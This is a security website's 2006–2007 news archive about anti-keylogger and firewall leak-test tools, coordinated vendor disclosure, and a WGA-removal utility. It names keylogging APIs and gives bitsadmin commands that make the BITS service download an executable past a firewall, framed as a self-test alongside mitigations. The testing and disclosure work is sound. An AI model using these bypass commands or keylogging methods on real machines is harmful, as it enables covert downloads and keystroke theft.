December 05 2007 : Anti-Keylogger Tester (AKLT) updated to 3.0
new keylogging method added :
Someone talked to me about an apparently new keylogging method being discussed at
Wilder Security Forum. This method
used by the testing tool in this thread is based on GetRawInputData() API, and bypasses some HIPS (there is still
fortunately HIPS detecting and blocking it).
That's the first time I hear of it, and from what we can see, for some security vendor too. However, I found references
to this keylogging method back to 2005. Therefore, that could mean that malware writers are aware of it since two years, and that
would explain why there is HIPS aware of it and detecting it.
I added myself this new method to AKLT with the same purpose than the last build, completeness. Moreover, AKLT does not require
at all Microsoft .NET unlike the tool mentioned in the aformentioned link. This enables everyone to test their security software
without the need to install third party libraries. Please note that this new method, GetRawInputData, is only available since
Windows XP and newer OS such as Vista (the tests button will be greyed out on Windows 2000 and prior).
You can download the new AKLT version.
Click here to download AKLT v3.0
December 04 2007 : System Shutdown Simulator mirrored on Firewall Leak Tester
new HIPS testing tool hosted :
Denis Sazonov discovered a flaw in various HIPS and created a test tool the 11/21/2007. I offered to host a mirror of his file on
Firewall Leak Tester.
This tool, System Shutdown Simulator, takes the opportunity of the system shutdown timeframe where
all of the applications, including security ones, are closing themselves. This timeframe can be paused and exploited.
Click here to download System Shutdown Simulator
October 24 2007 : Anti-Keylogger Tester (AKLT) updated
added two known keylogging methods :
Until now, I didn't include keylogging method using global hooks, as these are widely known and covered
in all of the most known security software since years. Global hooks can be created using SetWindowsHookEx() API, and depending
of the kind of hook, may or may not inject a DLL into all running processes.
However, for the sake of completeness, I thought that adding the two tests would be a good idea. This way, AKLT from now
offers 6 different keylogging tests, plus 2 screenshots tests. That means 8 security tests to check your
security software and settings.
From the same virus bulletin article I mentioned in the previous news, among the known in the wild keyloggers,
66% use hooks, 29% use hookless/cyclical polling, and 5% use a driver. :
Global Hook - Cyclical polling - Driver based
That means that AKLT v2.5 enables you to test
the behavior of 95% of the In The Wild keyloggers. For the remaining 5%, block driver loading by running a limited
user account, or by using an HIPS (once a driver is loaded, it can do much more than just keylogging).
There is a new
AKLT Guide which explains how to use AKLT,
and what kind of results you can expect.
Click here to download AKLT v2.5
October 19 2007 : new Anti-Keylogger Tester (AKLT) version
new keylogging method :
From this
viruslit.com article written in March 2007 (by Nikolay Grebennikov, Kaspersky Lab), we can see
that almost 50% of the malware detected by Symantec are aimed at harvesting data from the infected computer, one of these methods being
keylogging. Therefore, keylogging is a serious issue (needless to say it's even more an issue in corporations).
AKLT v2.0 is a new version adding a new keylogging function, based on GetKeyboardState() API.
When I tested on my side AKLT v2.0 on September against
13 different HIPS and/or dedicated anti-keylogging software,
10 of them (77%) were failing one of the
four keylogging methods, and 8 of them (61%) were failing the new method.
| Failing at least one test |
 77% |
| Failing new test |
61% |
| Passing all |
 23% |
That is very surprising that something known for years like keylogging seems still to work sucessfuly in most of the cases.
In front of such statistics, I sent a notice the
September 28 2007
to the following seven security vendor :
SysSafety (System Safety Monitor),
Kaspersky Lab (Kaspersky Internet Security),
GhostSecurity (AppDefend),
Comodo (Comodo Firewall),
ISecSoft (ProSecurity),
Tall Emu (OnlineArmor),
and
SoftSphere Technologies (DefenseWall).
I have also posted a version of AKLT to Malware-Research, a private forum for security vendors.
The 3 following software were passing all of the AKLT keylogging method before I contact any security vendor :
System Safety Monitor 2.4.0.619 beta,
Comodo Firewall 3.0.9.229 beta, and
OnlineArmor 2.1.0.9.
The 3 following security software vendors have found a fix to detect and block the new keylogging method. The fixed release is either already available or will be very shortly :
ProSecurity,
DefenseWall,
Kaspersky KAV/KIS.
GhostSecurity, maker of AppDefend, answered but did not give any date for the fix.
SnoopFree was already failing AKLT v1.0 (DirectX test). I sent them an email for the first time, simply asking if they would plan to improve their product or not. I didn't receive
any reply as of yet.
The following are failing at least one test, and were not contacted : EQSecure, ThreatFire, Advanced AntiKeylogger 3.7, Anti-Keylogger Shield 2.3, PrivacyKeyboard/Anti-Keylogger 7.4.
I did not contact them for various reasons, one of them is that some are unknown to me and I don't know if I can trust them.
Any
of these software maker can contact me to be in my "contact list" for future tools or leaktest release.
Please note that some of these dedicated anti-keylogger were randomly picked on the Internet, I have no idea if they can be trusted or not.
If you want to test yourself,
download AKLT v2.0.
September 26 2007 : New document published : Securing Windows - PART II
Guide to increase your security on Windows :
I have done another guide, that you can find on the
document page, which is the following of "Securing Windows - Part I"
(Securing Windows - PART 2 direct link).
This document is aimed at helping you to further increase your Windows security, by adding security software and using advanced
Windows security features. It is also meant to be a discussion exercise, about how much security is too much.
If you don't know how to fully secure your computer, or if you are unsuccessful at it, this guide is for you.
However, please note that the method described in this guide is just one way to achieve your goal, not the only way
possible. It is impossible to give the "best" universal way working for everyone and fitting every context.
As usual, if you find any error or mistake in the document, thank you in advance to contact me, for I can look into this matter.
March 14 2007 : Vista's security impact on the leaktests
New article:
The new Microsoft Operating System, Windows Vista, comes with many new security features. The question that arises is how
these features will stand against the leaktests ? We can also wonder if current leaktest's tricks may simply be incompatible
with Vista. Personally using Vista for more than a month, I wanted to know how secure Vista was by default.
You can read the resulting article
Vista's security impact on the leaktests to
discover some answers about these questions.
Of course Vista is still new and fairly recent, we are far from having discovered everything about it. As with any OS release,
we can bet that interesting discoveries will be made in a near future.
March 10 2007 : new webhoster
upgrade :
I have switched again to another webhoster. The previous one had a very bad support, taking weeks to answer you,
and sometimes not answering at all. Also, they had a hard time understanding why some leaktests are detected as malware
whereas they are not. While at the end everything was sucessfully solved, I didn't want to stay with them.
As with any moving, some things might get lost, thus if you find any dead link or anything missing, please send me a notice.
I do not send a newsletter only for this, so it's normal if you weren't emailed.
January 13 2007 : New tool released : Anti-Keylogger Tester
Test your HIPS's anti-keylogging functionality :
Some trojans includes keylogging functionalities, which can steal confidential information you are typing, before sending them via the network. To fight this threat,
many HIPS software, and also dedicated anti-keyloggers software, now provides anti-keylogger features. However, there is many ways to monitor the keyboard, and not all HIPS cover all ways to do keylogging.
Anti-Keylogger Tester (AKLT) is a tool using 3 different methods to monitor your keyboard (GetKeyState, GetAsyncKeyState, and DirectX) and enables you to check your defences.
AKLT does not try to monitor your keyboard by using a global hook, nor any DLL/code injection, as these methods are widely known
and covered by all security softwares I have tested.
Additionaly, AKLT provides two ways of taking screenshots, as a keylogger or a trojan could do. I am not aware of any HIPS
providing screenshot protection, but in case one of your security software is claiming to provide such feature, you will be able
to test it thanks to AKLT.
I have contacted and given a version of AKLT the
December 31 2006 to the following security vendors :
SysSafety (System Safety Monitor),
Kaspersky (KIS 6.0),
GhostSecurity (AppDefend),
Comodo,
Agnitum,
ProSecurity,
and
OnlineArmor. I have also posted a version of AKLT program to Malware-Research, a private forum for security vendors.
I was not aware of any HIPS providing a protection against the third DirectX AKLT's method, that's why I have contacted the software vendors first for a protection to be found. Agnitum and Comodo
only make personal firewalls and do not offer HIPS for now, but it was just in case, to bring awarness about the issue.
The following HIPS vendors have released a version of their software including a fix to detect and block the AKLT third keylogging method. You can download them now :
ProSecurity v1.26,
System Safety Monitor 2.3.0.608 beta.
The following security vendors does not have yet a fix, but wanted to express themselves about this issue :
Comodo
Comodo Firewall version 3.0, available March, will contain full HIPS
functionality and will detect these tests. However, the keylogging tests you
have developed do not fall within the scope of Comodo Firewall 2.3 as it was
not designed to include any HIPS functionality.
Comodo Firewall 2.3 does, however, detect keylogging programs should they
attempt make an outgoing connection to the internet and so prevents them
from compromising user privacy.
|
OnlineArmor
|
We've tested the latest internal build of Online Armor v2 against AKLT and all of the tests described will be passed
before release. We already have working code for getXXXKeystate detection and can detect (but not block yet) the DirectX keylogging.
This will be corrected before release.
|
Kaspersky should release a beta soon fixing this issue, probably next week.
You can view and download AKLT at the following
page.
November 26 2006 : New document published : Securing Windows
Guide for intermediate user :
I have written a guide, you can find on the
document page, to help people to learn the basis to configure and secure their Windows. This
guide does not talk
at all of which application to install, which antivirus, or which firewall; but instead explain how to manually configure Windows
to increase it's security. This guide talks, between other subjects, about updates, password, services, and privileges (restricted rights).
This guide is more designed for a level from beginners to intermediate, if you perfectly know how to configure Windows to lock it down,
this document is not for you.
If you find any mistake in the document (grammar or technical error) please report it to me.
October 11 2006 : Agnitum Outpost v4.0 has been released
anti-leak feature added :
As you may know,
Outpost v4.0 has been released recently. It is a great improvement from the previous versions, and it
now has a built-in "anti-leak" feature based on the leaktests from Firewall Leak Tester.
This feature is meant to handle all known leaktests, from Agnitum's description. I'm glad there is firewall vendors out there focusing on their user's security
by taking the leaktests seriously. Of course, this feature can be disabled if you don't need it.
Below is a quote from Agnitum :
We are very proud to release Outpost Firewall Pro 4.0 because Agnitum specialists have once again managed to prove their expert level in computer security. Our mission is to create high-end products and with the recent release it has been fully accomplished.
We designed the fourth version from the get-go to satisfy the top six critical security requirements for firewalls: inbound & outbound protection, program behavior monitoring, internal protection against unauthorized termination, automatic configuration for Internet-accessing apps, extensive activity monitoring features.
Our efforts have led to a 100% pass rate for all existing leaktests. That highlights the exceptional ability of Outpost Firewall Pro to withstand serious malware attacks aiming to steal personal data from a user's PC. Naturally, security-conscious folks will be looking to confirm these results independently, and in that respect we would like to thank Mr. Guillaume Kaddouch for his efforts of bringing a dedicated testing ground here at firewallleaktester.com. We hope users will like the unmatched performance of the new Outpost.
|
Besides the anti-leak feature, Outpost has some other great ones such as plugins against malformed DNS queries, or plugins to protect your computer from LAN attacks
such as ARP spoofing. For those connected directly to the Internet, the Attack Detection plugin is able to detect portscans and various TCP attacks.
Oupost 4.0 is definitly one firewall to try if you haven't one yet or if you are not satisfied of your current one.
Finally, as a last note, another firewall, free, is also progressing well in the leaktest fight and is used by some users, it is
Comodo.
For whose wondering, all of the lastest firewall versions will be tested in the next leaktest testing sessions, thought I have no date yet.
October 10 2006 : Microsoft taking control back of his WGA
RemoveWGA forbidden :
Microsoft complained to my webhoster about RemoveWGA.exe hosted in my tool folder, and put pressure to make me remove it.
I'm obliged to comply and have no choice about it.
I don't quite understand them as RemoveWGA is only designed to help the users
who have a legit Windows copy. Moreover, RemoveWGA is now widespread and is available from many mirrors and in various P2P networks, so removing
it from my website won't do that much.
They probably want to send a message, but I'm unsure if it will be really beneficial at the end. I let everyone makes his own opinion.
October 07 2006 : New test board, "Firewall termination defense" testing
38 termination methods used :
A new
firewall termination test page is born !
Leaktests methods can be used to bypass
silently your firewall, but what if it can be simply terminated and disabled, and then your data being sent out normally without using any leaktest
trick ? Some malware in the wild are trying to terminate various Anti-Virus and Firewall softwares, so I thought it may worth to add a test for that
also.
13 firewalls are tested against 38 termination methods, which means at least 500 tests done. As some tests are repeated many times to ensure
the correctness of the result, this is a great ammount of work. That explains why I didn't test all known firewall available, and why I didn't
use all termination tools I've found. However I plan later to add more tools and firewalls to the test bed, this time is just the begining.
I have used for the tests public termination tools freely available for anyone, thus for the firewall vendors
themselves. However, as for the leaktests, all of these termination methods used are only the
known ones, it probably exists
some
unknown and unpublished ways of termination. Always think to what might happen while securing
yourself (e.g : monitoring process execution to block potential unknown threats), and not only to what is currently known
.
August 1 2006 : RemoveWGA not helping piracy
piracy is illegal :
I have received some complaints from users who said that RemoveWGA was not working on their system.
RemoveWGA was saying that WGA notification was not active, despites the WGA popups telling the user their Windows was pirated.
After investigation, it appears that RemoveWGA works well on legit Windows copies (it detects the WgaLogon DLL being loaded) but is unable
to see the DLL on pirated Windows, hence saying that WGA notification is not active. In fact, Windows seems to cloak the DLL from RemoveWGA
purposefully if it is running on a pirated copy.
At first, as I didn't know that RemoveWGA was not working
only on pirated OS, I made a fix to make it to work in all cases, and I posted it on a forum.
After discovering that only pirates had the problem, I quickly removed the fix and the manual steps to disable and remove the WGA notification tool on pirated Windows.
While I still think that honest people being wrongly spotted as pirate should be helped, they are a minority, and should
contact Microsoft. The other real pirated copies
should not receive any help. I do not support piracy, I'm strongly against it, and will stand on this.
RemoveWGA is done to help legit Windows users to remove the WGA Notification update if they installed it inadvertedly, and feel concerned about their privacy and security. It
will not work on not genuine copies.
If you are running a pirated Windows, you must buy a valid and legit licence
July 29 2006 : new RemoveWGA version out
RemoveWGA 1.2 release :
This version removes cleanly both WGA Notification 'Pilot' version and 'Final' version, it should theoretically not be needed anymore to
directly unload the WGA notification in live from memory and to risk a blue screen (BSOD).
If RemoveWGA finds the final WGA notification version, it "disables" the file WgaLogon.dll by preventing the SYSTEM account to access it (using the
Windows file cacls.exe).
After a reboot, it tries to remove the WGA notification, and only then, if it cannot do it, it offers you the brutal WGA removing.
RemoveWGA 1.2 has been successfully tested against the pilot and final version of WGA notification on both Windows XP SP2 Professional & Home Edition (clean removal).
To sume up, RemoveWGA now uses 3 different WGA removal methods, depending of the WGA version installed on your computer. The last one (BSOD) should
not be used, except may be for futur WGA versions if the clean removal methods fail. If it happens, RemoveWGA will popup a warning and will ask you
before trying anything.
June 30 2006 : new RemoveWGA version out
Windows
Genuine
Advantage Notification UPDATE :
Microsoft has released the June 27 2006 an update to it's WGA Notification package.
Officially, it will phone home a lot less (not anymore every boot), and the EULA describes more clearly
what is the purpose of this "update".
However, what is not told to you, is that this updated version also prevents RemoveWGA to remove the WGA Notification tool.
Indeed RemoveWGA 1.02 will return an error saying
"WgaLogon.dll or WgaTray.exe cannot be set for deletion at next reboot. Operation aborted".
Microsoft wants to keep control on WGA, and they provide themselves a guide to manually uninstall the WGA Notification
PILOTE version:
Official Microsoft Removal Guide
Unsurprisingly, the method offered is complicated for a standard home user with no IT knowledge and requires 3 restarts of your computer. I do not understand
the logic behind this, it would have been far easier to provide a "uninstall" button, instead of providing a guide
that some clueless users won't probably be able to follow, or will simply give up.
Also, from the webpage :
Important These instructions have not been tested on the general release version of the WGA Notifications. Therefore, these instructions are not supported. which
probably means that lastest WGA notification update being the final release, cannot be removed with this guide ?
Finally, I release
RemoveWGA 1.1 to remove the last WGA notification update. However this time, if it detects
that it is blocked from doing it the proper way (unlike the previous WGA version), then it will offer you a "forced" live unloading of
WGA from memory.
removing WGA notification this way will crash your computer !
Indeed, the WgaLogon.dll is unloaded from the winlogon.exe process, which crashes few seconds afterwards, after that the WGA files have been deleted.
You must do a hard reset of your computer quickly after the "succesfull" popup. I'm not happy with this method, but it removes the WGA notification instantly.
YOU SHOULD NOT USE THIS METHOD IF YOU HAVEN'T BACKUPS
As with any BSOD, data loss can occurs and a check disk can be needed. If you are unsure of what you are doing, do NOT do this
I provide the RemoveWGA 1.1 version for people who wants to get rid of the WGA notification at all cost. I used it multiples time on my test
computer (I wilingly crashed it many times) without any trouble. But keep in mind that halting your system in a bad state can lead to data loss.
Do not come after me if you loose any data.
To finish, it's possible that the next update won't be removable by RemoveWGA, if Microsoft's wants to lock WGA down, they can.
If they do, there will always be manual ways such as booting on a BartPE CD.
Untill the day where the WGA notification will be mandatory (if it happens), and where uninstalling it will mean that you won't be able
to install any security updates (don't worry, it's not the case yet).
June 23 2006 : new webhoster for firewall leak tester
upgrade :
I have upgraded the server where the website is hosted to a newer one able to handle more traffic.
My previous webhoster wasn't able to handle the recent traffic spike caused by the RemoveWGA tool release on my website.
Everything should have been restored correctly, databases - downloads - links, but if anyway you find anything wrong (dead links, errors, etc...), please
submit it to me by writing a mail at
webmaster@firewallleaktester.com
It remains a minor issue due to the new server's configuration, every mail sent by firewall leak tester will have as sender address "anonymous@firewallleaktester.com".
I am working on this, but it does not affect the website functionalities. I do not wish to publish any news on the newsletter, until it's solved.
Finally, this new dedicated server costs me much more than the previous one, and
donations are still appreciated (donation possible via a Paypal account
or directly online with a credit card)
I wish you a good surfing.
June 10 2006 : Windows BITS service bypasses default firewall rules
BITS service opens a big hole on your computer :
1 - BITS explanation :
The BITS service is used by the automatic Windows update feature to check and download updates if
available. Althought used by default only by Windows, this service can be managed/controlled by any application
running.
From Microsoft :
|
Background Intelligent Transfer Service (BITS) asynchronously transfers files in the foreground or background,
throttles the transfers to preserve the responsiveness of other network applications, and automatically resumes file
transfers after network disconnects and machine restarts. Applications use the BITS application program interface (API) to create transfer jobs and to monitor the progress
of jobs in the transfer queue. The BITS API is included in the Microsoft® Platform Software Development Kit (SDK).
|
2 - issue/consequence :
Any application can create a "job", and requests to download some files. The BITS service (included in svchost.exe in WindowsXP, and should be services.exe
in Windows 2000) will then act as a proxy, and will download the files and save them where requested. From your firewall point of view, it is the service
which is accessing the network, not the application who asked the file.
This issue is NOT a vulnerability, this is a Windows feature, and the BITS service behaviour is expected to be like this.
This is also NOT a firewall vulnerability. By default you may have fully allowed svchost.exe (access to ports 80 and 443) to access the Internet (if you enabled
automatic Windows update), but knowing this issue, you may now consider to reconfigure it.
The original discoverer who reported this issue to me (the April 28), is
Tim Fish (info@fi5h.co.uk).
3 - testing yourself :
If you wish to test it yourself, you can download the BITSADMIN.EXE utility from Microsoft :
Windows XP Service Pack 2 Support Tools
Then, you can type the following commands in a command prompt :
bitsadmin /create JOBNAME
bitsadmin /addfile JOBNAME http://www.firewallleaktester.com/tools/wwdc.exe c:\wwdc.exe
bitsadmin /resume JOBNAME
bitsadmin /info JOBNAME
bitsadmin /complete JOBNAME
Once the utility downloaded, if you do not want to type all of these lines many times while testing, you can download
the following GUI I quickly did :
BITS_tester.exe.
Put both files BITS_tester and BITSADMIN in the same
folder before executing the tool (not on your desktop, seems not to work there).
BITS_tester is NOT a leaktest, it is simply a GUI to control the utility from Microsoft.
4 - Solution :
The only way to prevent abuses is to restrict in your firewall the IPs svchost.exe (or services.exe) is allowed to access. On my side,
I need to allow these IP ranges (
text file) :
5 - Example (with Jetico) :
The following is done with Jetico, but it can be done with any firewall. Report to you help file or your support forum
if you do not know how to create network rules with your firewall.
You first need to create a new table
, inside which you have to add the following network
rules (
original picture) :
Then, in the
Table, add a line like this :
Now, if you execute the BITS_tester, Jetico will ask for network access for both BITS_tester and BITSADMIN, and will
at the end (and it should be the case for every firewall) ask about outbound connection to firewallleaktester :
6 - Conclusion :
You should never "Allow all" an application, even if you trust it, and especially for the system processes. Always restrict it to the ports
AND IP addresses it needs,
it includes your ISP DNS servers IPs for instance. SVCHOST.EXE on WindowsXP is a proxy for many features and it can be abused (like
with this BITS issue, and also remember the DNStester leaktest). Consequently you must restrict it tightly to not open doors to
potential malwares. Every firewall, coming with a rule for svchost which allows ports 80 and 443 to
every IP, can be bypassed.
Also notice that the IP ranges given may not be complete, it might be possible that on your country svchost needs to access other ranges.
If your firewall warns you about an access to an IP not being in the given ranges, to know the range to which the IP belongs, you can use the
"IPWHOIS Lookup" from the website
http://www.dnsstuff.com/. Simply enter the IP in the box,
the website will give you the associated IP range and CIDR.
Until now, I've talked only about downloading, but the BITS service (last version) can be used to upload files as well if you have a machine
where the IIS web server service is running.
As a side note, about those who say you shouldn't be infected in the first place, they are of course right. But a firewall is still needed to control legit
Windows components or unwanted application behavior (e.g MS Word acessing the net). Also,
in case something got planted in your PC,
having restricted anything to what it needs only will mitigate the consequences. It's like the airbag of your car, theoretically you shouldn't need it,
because you drive well and not too fast. But if anyway you have an accident, having an airbag will decrease the damages.
Finally, disabling all together the automatic update service and BITS service is not a solution. Indeed, a malware could start them back before
using them. I do not advise at all to disable Automatic Windows Updates, but if you go that way, do not forget to also block svchost.exe or services.exe
in your firewall (if you are using DHCP, create a rule to allow local port 68 to communicate in UDP to the remote port 67, IP 255.255.255.255).
June 8 2006 : two new leaktests added
Comodo Parent Injection Leak Test & PCFlank Leaktest :
I have added two leaktests to the site,
CPIL leaktest from COMODO which released by the way the version 2
of their firewall (being a lot better regarding leaktests, from them), and
PCFlank leaktest from
PCFlank, well known
security website.
The methods used are known (DLL/Code injection, OLE browser manipulation), but they are used slightly differently, sometimes not handled by
the various personal firewalls.
However, I do not have the time currently to test them against every firewalls, I have consequently not updated the results board.
May 21 2006 : KIS & KAV 6.0 released
Antivirus and Firewall available :
The Firewall Leak Tester "Best Choice" awarded Kaskerspey Internet Security 6.0 (KIS 6.0) was commercially released
the May 15 2006, as well as Kaspersky Antivirus 6.0. Both are available in trial or commercial version at :
http://www.kaspersky.com/
They were previously in beta stage. The last commercial build is the 6.0.0.300
The other "Best Choice" awarded software, Ghost Security Suite (AppDefend & Regdefend), is still in beta for now, I have no news and no expected release date as of now.
News Archive
